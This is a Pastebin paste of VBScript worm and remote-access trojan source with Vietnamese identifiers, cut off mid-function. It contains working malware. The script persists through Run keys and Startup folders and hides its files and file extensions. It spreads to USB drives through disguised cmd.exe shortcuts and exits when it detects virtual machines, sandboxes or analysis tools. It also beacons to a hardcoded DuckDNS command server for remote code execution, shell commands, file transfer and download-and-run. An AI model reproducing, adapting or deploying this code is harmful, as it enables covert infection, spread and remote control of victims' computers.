API tools faq
paste
Advertisement
mariacdt

wor7000

mariacdt
Jun 24th, 2019
703
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.26 KB | None | 0 0
raw download clone embed print report
  1.  
  2. DT_ID_CHO_PC = Trim(GOBO_KYTUSAI_HAM("")) 'Name for Machine ID (Recommend: Should enter)
  3. DT_TENSAUCAIDAT = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'The worm Name after it installed (Recommend: Should enter)
  4. DT_USER_DANGKY = GOBO_KYTUSAI_HAM("") 'Name of User Registry (Recommend: Should enter. And choose a UNIQUE NAME to use for the Worm update times)
  5. DT_THUMUCCON_INS = Trim(GOBO_KYTUSAI_HAM("")) 'Name of Install subFolder - Tip: Do not use folder name same any folder of System
  6. DT_MACHINE_DANGKY = GOBO_KYTUSAI_HAM("") 'Name of Machine Registry
  7. DT_SSTTAARRTTUUPP_FN = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'Name of Install Startup
  8. DT_USB_SSD_FN = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'Name of USB Spread file
  9. DT_FOLDER_IN_TEMP = Trim(GOBO_KYTUSAI_HAM("")) 'Name of Temp subFolder
  10. BATTAT_CHONG_MAYAO = false 'Anti Virtual Machines - default false
  11. BATTAT_CHOPCAT_FILEMAN = false 'Anti Sandbox, tracking,... - default false
  12. BATTAT_LAYLAN_LINKTAPTIN_USB = false
  13. BATTAT_LAYLAN_LINKTHUMUC_USB = false
  14. TF_HIEN_TMUCSFILES_USB = true 'Hide/Show for files/Folders which already exits in USB - (true = Show it; false = Hide it; default - true)
  15. BATTAT_ANTI1 = true 'Antis 1 - default true
  16. BATTAT_ANTI2 = false 'Antis 2 - default false
  17. BATTAT_XOARAC = true 'Delete temp files/subFolders of system, user TEMP/IE - default true
  18. DIACHI_KETNOI = "microsoftoutlook.duckdns.org"
  19. CONG_KETNOI = 7000
  20. GALAXY = "%temp%"
  21. THOIGIAN_CAIDAT = 1 'Set the delay to connecting (milisecond, 1000 = 1s)
  22. DDANMACDINH_CAIDATSAU = GALAXY & "\" & DT_THUMUCCON_INS
  23. THOIGIAN_LAMTUOI = 4914
  24. MK = "<" & "|" & ">"
  25. WS_CODENAME = wscript.scriptname
  26. WS_FCODENAME = wscript.scriptfullname
  27. COHAYKO_TU_USB = ""
  28. dim OBJ_WSSHELL,OBJ_HTHONG_TTIN,MANGCUATUI,KETNOI_DA_SANSANG,LENHTHUCTHI,TSO_CHO_LENHTHUCTHI,THEFIRST_CHOCAPNHAT
  29. dim OBJ_SYS_ENV,OBJ_USER_ENV,STR_THUMUC_FILETAM_IE
  30. set OBJ_WSSHELL = wscript.createobject("wscript.shell")
  31. set OBJ_HTHONG_TTIN = createobject("scripting.filesystemobject")
  32. set MANGCUATUI = createobject("msxml2.xmlhttp")
  33. set OBJ_SYS_ENV = OBJ_WSSHELL.Environment("System")
  34. set OBJ_USER_ENV = OBJ_WSSHELL.Environment("User")
  35. set DT_WMG_DOT = getobject("winmgmts:\\.\root\cimv2")
  36. set DT_WMG_IMP = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  37. TRUYVAN_PROC = "select * from win32_process where name="
  38. DDAN_SSTTAARRTTUUPP_CUR = OBJ_WSSHELL.specialfolders("startup") & "\"
  39. DDAN_SSTTAARRTTUUPP_ALL = OBJ_WSSHELL.specialfolders("AllUsersStartup") & "\"
  40. STR_DUONGDAN_USER_TEMP = OBJ_WSSHELL.ExpandEnvironmentStrings(OBJ_USER_ENV("TEMP"))
  41. STR_DUONGDAN_SYS_TEMP = OBJ_WSSHELL.ExpandEnvironmentStrings(OBJ_SYS_ENV("TEMP"))
  42. STR_USER_PROFILE = OBJ_WSSHELL.ExpandEnvironmentStrings("%userprofile%")
  43. if DT_THUMUCCON_INS = "" Or DT_THUMUCCON_INS = " " then
  44. DDANMACDINH_CAIDATSAU = GALAXY
  45. else
  46. if not OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS) then
  47. OBJ_HTHONG_TTIN.CreateFolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS)
  48. wscript.sleep 100
  49. end if
  50. end if
  51. if (DT_TENSAUCAIDAT = "" & ".vbs") Or (DT_TENSAUCAIDAT = " " & ".vbs") then DT_TENSAUCAIDAT = WS_CODENAME
  52. if (DT_SSTTAARRTTUUPP_FN = "" & ".vbs") Or (DT_SSTTAARRTTUUPP_FN = " " & ".vbs") then DT_SSTTAARRTTUUPP_FN = WS_CODENAME
  53. if (DT_USB_SSD_FN = "" & ".vbs") Or (DT_USB_SSD_FN = " " & ".vbs") then DT_USB_SSD_FN = WS_CODENAME
  54. if DT_USER_DANGKY = "" then DT_USER_DANGKY = split(WS_CODENAME,".")(0)
  55. if DT_MACHINE_DANGKY = "" then DT_MACHINE_DANGKY = split(WS_CODENAME,".")(0)
  56. THUMUC_CAIDAT_SAU = OBJ_WSSHELL.expandenvironmentstrings(DDANMACDINH_CAIDATSAU) & "\"
  57. if not OBJ_HTHONG_TTIN.folderexists(THUMUC_CAIDAT_SAU) then THUMUC_CAIDAT_SAU = OBJ_WSSHELL.expandenvironmentstrings("%temp%") & "\"
  58. on error resume next
  59. TREES_HAM
  60. function TREES_HAM
  61. on error resume next
  62. if BATTAT_CHONG_MAYAO then CHONGMAYAO_HAM()
  63. if BATTAT_CHOPCAT_FILEMAN then CHOPCAT_FILEMAN_HAM()
  64. COHAYKO_TU_USB = OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\")
  65. if COHAYKO_TU_USB = "" then
  66. if lcase(mid(WS_FCODENAME,2)) = ":\" & lcase(WS_CODENAME) then
  67. COHAYKO_TU_USB = "true - " & date
  68. OBJ_WSSHELL.regwrite "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\", COHAYKO_TU_USB, "REG_SZ"
  69. else
  70. COHAYKO_TU_USB = "false - " & date
  71. OBJ_WSSHELL.regwrite "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\", COHAYKO_TU_USB, "REG_SZ"
  72. end if
  73. end if
  74. if not OBJ_HTHONG_TTIN.FolderExists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
  75. OBJ_HTHONG_TTIN.CreateFolder(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP)
  76. wscript.sleep 44
  77. end if
  78. CAIDATVAOMAY_SUB
  79. set RUTGON_FNAME = OBJ_HTHONG_TTIN.getfile(WS_FCODENAME)
  80. set RUTGON_FNAME_DACAI = OBJ_HTHONG_TTIN.getfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT)
  81. if lcase(RUTGON_FNAME.shortpath) <> lcase(RUTGON_FNAME_DACAI.shortpath) then
  82. wscript.sleep THOIGIAN_CAIDAT
  83. OBJ_WSSHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chr(34)
  84. end if
  85. err.clear
  86. set THEFIRST_CHOCAPNHAT = OBJ_HTHONG_TTIN.opentextfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,8,false,-1)
  87. if err.number > 0 then wscript.quit
  88. end function
  89. function CHONGMAYAO_HAM()
  90. on error resume next
  91. set OBJ_WMI_WCSP = GetObject("WinMgmts:")
  92. set COT_WCSP = OBJ_WMI_WCSP.ExecQuery("Select * from Win32_ComputerSystemProduct")
  93. for each BOOBS in COT_WCSP
  94. if instr(lcase(BOOBS.name),"virtual") > 0 then
  95. on error resume next
  96. OBJ_HTHONG_TTIN.deletefile(WS_FCODENAME)
  97. do
  98. THOAT_XAC
  99. loop
  100. end if
  101. next
  102. set OBJ_WMI_WCSP = nothing
  103. end function
  104. function CHOPCAT_FILEMAN_HAM
  105. set TTR_KOCAI_KOCHAY_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SandboxieRpcSs.exe'")
  106. set TTR_KOCAI_KOCHAY_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'ProcessHacker.exe'")
  107. set TTR_KOCAI_KOCHAY_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'FileMonitor.exe'")
  108. set TTR_KOCAI_KOCHAY_4 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Procmon.exe'")
  109. set TTR_KOCAI_KOCHAY_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SysTracer.exe'")
  110. set TTR_KOCAI_KOCHAY_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SpyTheSpy.exe'")
  111. if TTR_KOCAI_KOCHAY_1.Count=1 then
  112. THOAT_XAC
  113. elseif TTR_KOCAI_KOCHAY_2.Count=1 then
  114. THOAT_XAC
  115. elseif TTR_KOCAI_KOCHAY_3.Count=1 then
  116. THOAT_XAC
  117. elseif TTR_KOCAI_KOCHAY_4.Count=1 then
  118. THOAT_XAC
  119. elseif TTR_KOCAI_KOCHAY_5.Count=1 then
  120. THOAT_XAC
  121. elseif TTR_KOCAI_KOCHAY_6.Count=1 then
  122. THOAT_XAC
  123. end if
  124. end function
  125. function UAC_DABAT_HAM()
  126. on error resume next
  127. if OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop")=0 then
  128. UAC_DABAT_HAM = false
  129. else
  130. UAC_DABAT_HAM = true
  131. end if
  132. end function
  133. sub CAIDATVAOMAY_SUB()
  134. on error resume next
  135. if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")="1" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")<>0 then
  136. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
  137. end if
  138. if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="0" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="" then
  139. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"
  140. end if
  141. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY, "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chrw(34),"REG_SZ"
  142. OBJ_WSSHELL.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY, "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chrw(34),"REG_SZ"
  143. if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
  144. if OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS) then
  145. OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=2+4
  146. end if
  147. end if
  148. if not OBJ_HTHONG_TTIN.fileexists(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT) then
  149. OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,true
  150. wscript.sleep 10
  151. OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=2+4
  152. end if
  153. if not OBJ_HTHONG_TTIN.fileexists(DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN) then
  154. OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
  155. wscript.sleep 10
  156. OBJ_HTHONG_TTIN.GetFile(DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN).Attributes=0+4
  157. end if
  158. if not OBJ_HTHONG_TTIN.fileexists(DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN) then
  159. OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
  160. wscript.sleep 10
  161. OBJ_HTHONG_TTIN.GetFile(DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN).Attributes=0+4
  162. end if
  163. if BATTAT_XOARAC then
  164. XOA_TEMP_SAU_X_NGAY_SUB STR_DUONGDAN_USER_TEMP
  165. XOA_TEMP_SAU_X_NGAY_SUB STR_DUONGDAN_SYS_TEMP
  166. STR_THUMUC_FILETAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
  167. XOA_TEMP_SAU_X_NGAY_SUB STR_THUMUC_FILETAM_IE
  168. STR_THUMUC_FILETAM_IE = STR_THUMUC_FILETAM_IE & "\Content.IE5"
  169. XOA_TEMP_SAU_X_NGAY_SUB STR_THUMUC_FILETAM_IE
  170. end if
  171. end sub
  172. sub GOBO_SUB
  173. on error resume next
  174. dim TEN_FILE_IN_USB
  175. if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
  176. OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=0
  177. end if
  178. OBJ_HTHONG_TTIN.GetFile(WS_FCODENAME).Attributes=0
  179. OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=0
  180. THEFIRST_CHOCAPNHAT.close
  181. OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\"
  182. OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY
  183. OBJ_WSSHELL.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY
  184. OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
  185. OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
  186. OBJ_HTHONG_TTIN.deletefile WS_FCODENAME,true
  187. OBJ_HTHONG_TTIN.deletefile THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,true
  188. if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")="1" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")<>0 then
  189. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
  190. end if
  191. if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="0" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="" then
  192. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"
  193. end if
  194. if BATTAT_XOARAC then
  195. XOA_FILEVAFOLDER_SUB STR_DUONGDAN_USER_TEMP
  196. XOA_FILEVAFOLDER_SUB STR_DUONGDAN_SYS_TEMP
  197. STR_THUMUC_FILETAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
  198. XOA_FILEVAFOLDER_SUB STR_THUMUC_FILETAM_IE
  199. STR_THUMUC_FILETAM_IE = STR_THUMUC_FILETAM_IE & "\Content.IE5"
  200. XOA_FILEVAFOLDER_SUB STR_THUMUC_FILETAM_IE
  201. end if
  202. for each CAC_USB in OBJ_HTHONG_TTIN.drives
  203. if CAC_USB.isready = true then
  204. if CAC_USB.freespace > 0 then
  205. if CAC_USB.drivetype = 1 then
  206. for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").files
  207. on error resume next
  208. if instr(TAPTIN_DACO_IN_USB.name,".") then
  209. if lcase(split(TAPTIN_DACO_IN_USB.name, ".")(ubound(split(TAPTIN_DACO_IN_USB.name, ".")))) <> "lnk" then
  210. TAPTIN_DACO_IN_USB.attributes=0
  211. if ucase(TAPTIN_DACO_IN_USB.name) <> ucase(DT_USB_SSD_FN) then
  212. TEN_FILE_IN_USB = split(TAPTIN_DACO_IN_USB.name,".")
  213. OBJ_HTHONG_TTIN.deletefile(CAC_USB.path & "\" & TEN_FILE_IN_USB(0) & ".lnk")
  214. else
  215. OBJ_HTHONG_TTIN.deletefile(CAC_USB.path & "\" & TAPTIN_DACO_IN_USB.name)
  216. end if
  217. else
  218. OBJ_HTHONG_TTIN.deletefile(TAPTIN_DACO_IN_USB.path)
  219. end if
  220. end if
  221. OBJ_HTHONG_TTIN.DeleteFile CAC_USB.path & "\" & DT_USB_SSD_FN,true
  222. next
  223. for each THUMUC_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").subfolders
  224. THUMUC_DACO_IN_USB.attributes=0
  225. next
  226. end if
  227. end if
  228. end if
  229. next
  230. if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
  231. OBJ_HTHONG_TTIN.deletefolder OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS,true
  232. end if
  233. OBJ_HTHONG_TTIN.deletefolder STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP,true
  234. wscript.quit
  235. end sub
  236. sub GOBO_CAPNHAT_SUB()
  237. on error resume next
  238. if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
  239. OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=0
  240. end if
  241. OBJ_HTHONG_TTIN.GetFile(WS_FCODENAME).Attributes=0
  242. OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=0
  243. OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\"
  244. OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY
  245. OBJ_WSSHELL.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY
  246. XOA_FILEVAFOLDER_SUB DDAN_SSTTAARRTTUUPP_CUR
  247. XOA_FILEVAFOLDER_SUB DDAN_SSTTAARRTTUUPP_ALL
  248. OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
  249. OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
  250. for each CAC_USB in OBJ_HTHONG_TTIN.drives
  251. if CAC_USB.isready = true then
  252. if CAC_USB.freespace > 0 then
  253. if CAC_USB.drivetype = 1 then
  254. for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").files
  255. on error resume next
  256. OBJ_HTHONG_TTIN.DeleteFile CAC_USB.path & "\" & DT_USB_SSD_FN,true
  257. next
  258. end if
  259. end if
  260. end if
  261. next
  262. err.clear
  263. end sub
  264. while true
  265. if BATTAT_ANTI1 then ROUTER_MOT()
  266. if BATTAT_ANTI2 then ROUTER_HAI()
  267. CAIDATVAOUSB_SUB
  268. KETNOI_DA_SANSANG = ""
  269. KETNOI_DA_SANSANG = THANKGOD_YOUAREHERE("is-ready","")
  270. LENHTHUCTHI = split(KETNOI_DA_SANSANG,MK)
  271. select case LENHTHUCTHI(0)
  272. case "excecute"
  273. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  274. execute TSO_CHO_LENHTHUCTHI
  275. case "update"
  276. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  277. THEFIRST_CHOCAPNHAT.close
  278. GOBO_CAPNHAT_SUB
  279. set THEFIRST_CHOCAPNHAT = OBJ_HTHONG_TTIN.opentextfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,2,false,-1)
  280. THEFIRST_CHOCAPNHAT.write TSO_CHO_LENHTHUCTHI
  281. THEFIRST_CHOCAPNHAT.close
  282. OBJ_WSSHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chr(34)
  283. OBJ_HTHONG_TTIN.getfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).attributes=2+4
  284. wscript.quit
  285. case "uninstall"
  286. GOBO_SUB
  287. case "send"
  288. DUAFILELEN_VIC_ROICHAY_SUB LENHTHUCTHI(1),LENHTHUCTHI(2)
  289. case "site-send"
  290. LAY_FILETHEO_URL_VA_THUCTHI_SUB LENHTHUCTHI(1),LENHTHUCTHI(2)
  291. case "recv"
  292. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  293. LAY_FILE_VENHA_FILEMAN_HAM(TSO_CHO_LENHTHUCTHI)
  294. case "enum-driver"
  295. THANKGOD_YOUAREHERE "is-enum-driver",LAYCACODIA_HAM
  296. case "enum-faf"
  297. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  298. THANKGOD_YOUAREHERE "is-enum-faf",CACTHUMUC_HAM(TSO_CHO_LENHTHUCTHI)
  299. case "enum-process"
  300. THANKGOD_YOUAREHERE "is-enum-process",CACTIENTRINH_HAM
  301. case "cmd-shell"
  302. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  303. THANKGOD_YOUAREHERE "is-cmd-shell",DIEUKHIEN_CMD_HAM(TSO_CHO_LENHTHUCTHI)
  304. case "delete"
  305. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  306. XOA_TAPTIN_VA_THUMUC_SUB(TSO_CHO_LENHTHUCTHI)
  307. case "exit-process"
  308. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  309. TAT_TIENTRINH_SUB(TSO_CHO_LENHTHUCTHI)
  310. case "sleep"
  311. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  312. THOIGIAN_LAMTUOI = eval(TSO_CHO_LENHTHUCTHI)
  313. end select
  314. wscript.sleep THOIGIAN_LAMTUOI
  315. wend
  316. sub CAIDATVAOUSB_SUB
  317. on error resume next
  318. dim LOITATER,TEN_FILE_IN_USB,TEN_THUMUC_IN_USB,ICON_LINKFILE_IN_USB,ICON_THUMUC_IN_USB
  319. for each CAC_USB in OBJ_HTHONG_TTIN.drives
  320. if CAC_USB.isready = true then
  321. if CAC_USB.freespace > 0 then
  322. if CAC_USB.drivetype = 1 then
  323. if not OBJ_HTHONG_TTIN.fileexists(CAC_USB.path & "\" & DT_USB_SSD_FN) then
  324. OBJ_HTHONG_TTIN.copyfile WS_FCODENAME, CAC_USB.path & "\" & DT_USB_SSD_FN,true
  325. end if
  326. for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").Files
  327. if not BATTAT_LAYLAN_LINKTAPTIN_USB then exit for
  328. if instr(TAPTIN_DACO_IN_USB.name,".") then
  329. if lcase(split(TAPTIN_DACO_IN_USB.name, ".") (ubound(split(TAPTIN_DACO_IN_USB.name, ".")))) <> "lnk" then
  330. OBJ_HTHONG_TTIN.getfile(CAC_USB.path & "\" & DT_USB_SSD_FN).attributes=2+4
  331. if ucase(TAPTIN_DACO_IN_USB.name) <> ucase(DT_USB_SSD_FN) then
  332. TEN_FILE_IN_USB = split(TAPTIN_DACO_IN_USB.name,".")
  333. set LOITATER = OBJ_WSSHELL.createshortcut(CAC_USB.path & "\" & TEN_FILE_IN_USB(0) & ".lnk")
  334. LOITATER.windowstyle = 7
  335. LOITATER.targetpath = "cmd.exe"
  336. LOITATER.workingdirectory = ""
  337. LOITATER.arguments = "/c start " & replace(DT_USB_SSD_FN," ", chrw(34) & " " & chrw(34)) & "&start " & replace(TAPTIN_DACO_IN_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  338. ICON_LINKFILE_IN_USB = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & split(TAPTIN_DACO_IN_USB.name, ".")(ubound(split(TAPTIN_DACO_IN_USB.name, ".")))& "\") & "\defaulticon\")
  339. if instr(ICON_LINKFILE_IN_USB,",") = 0 then
  340. LOITATER.iconlocation = TAPTIN_DACO_IN_USB.path
  341. else
  342. LOITATER.iconlocation = ICON_LINKFILE_IN_USB
  343. end if
  344. LOITATER.save()
  345. end if
  346. if TF_HIEN_TMUCSFILES_USB then
  347. TAPTIN_DACO_IN_USB.attributes=0
  348. else
  349. TAPTIN_DACO_IN_USB.attributes=2
  350. end if
  351. end if
  352. end if
  353. next
  354. for each THUMUC_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\" ).subfolders
  355. if not BATTAT_LAYLAN_LINKTHUMUC_USB then exit for
  356. TEN_THUMUC_IN_USB = THUMUC_DACO_IN_USB.name
  357. set LOITATER = OBJ_WSSHELL.createshortcut(CAC_USB.path & "\" & TEN_THUMUC_IN_USB & ".lnk")
  358. LOITATER.windowstyle = 7
  359. LOITATER.targetpath = "cmd.exe"
  360. LOITATER.workingdirectory = ""
  361. LOITATER.arguments = "/c start " & replace(DT_USB_SSD_FN," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(THUMUC_DACO_IN_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  362. ICON_THUMUC_IN_USB = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\folder\defaulticon\")
  363. if instr(ICON_THUMUC_IN_USB,",") = 0 then
  364. LOITATER.iconlocation = THUMUC_DACO_IN_USB.path
  365. else
  366. LOITATER.iconlocation = ICON_THUMUC_IN_USB
  367. end if
  368. LOITATER.save()
  369. if TF_HIEN_TMUCSFILES_USB then
  370. THUMUC_DACO_IN_USB.attributes=0
  371. else
  372. THUMUC_DACO_IN_USB.attributes=2
  373. end if
  374. next
  375. end if
  376. end if
  377. end if
  378. next
  379. CAIDATVAOMAY_SUB
  380. err.clear
  381. end sub
  382. sub THOAT_XAC
  383. wscript.sleep 11
  384. wscript.quit
  385. end sub
  386. function ROUTER_MOT()
  387. on error resume next
  388. set RTM_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'ProcessHacker.exe'")
  389. set RTM_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'procexp.exe'")
  390. set RTM_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Procmon.exe'")
  391. set RTM_4_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'pchunter32.exe'")
  392. set RTM_4_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'pchunter64.exe'")
  393. set RTM_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SysTracer.exe'")
  394. set RTM_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'spybhoremover.exe'")
  395. set RTM_7 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'defenderdaemon.exe'")
  396. set RTM_8 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Wireshark.exe'")
  397. set RTM_9 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Vbs Lookup.exe'")
  398. set RTM_10 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Vbs Anti.exe'")
  399. set RTM_11 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'roguekiller.exe'")
  400. set RTM_12 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'fakenet.exe'")
  401. if RTM_1.Count=1 then
  402. THOAT_XAC
  403. elseif RTM_2.Count=1 then
  404. THOAT_XAC
  405. elseif RTM_3.Count=1 then
  406. THOAT_XAC
  407. elseif RTM_4_1.Count=1 then
  408. THOAT_XAC
  409. elseif RTM_4_2.Count=1 then
  410. THOAT_XAC
  411. elseif RTM_5.Count=1 then
  412. THOAT_XAC
  413. elseif RTM_6.Count=1 then
  414. THOAT_XAC
  415. elseif RTM_7.Count=1 then
  416. THOAT_XAC
  417. elseif RTM_8.Count=1 then
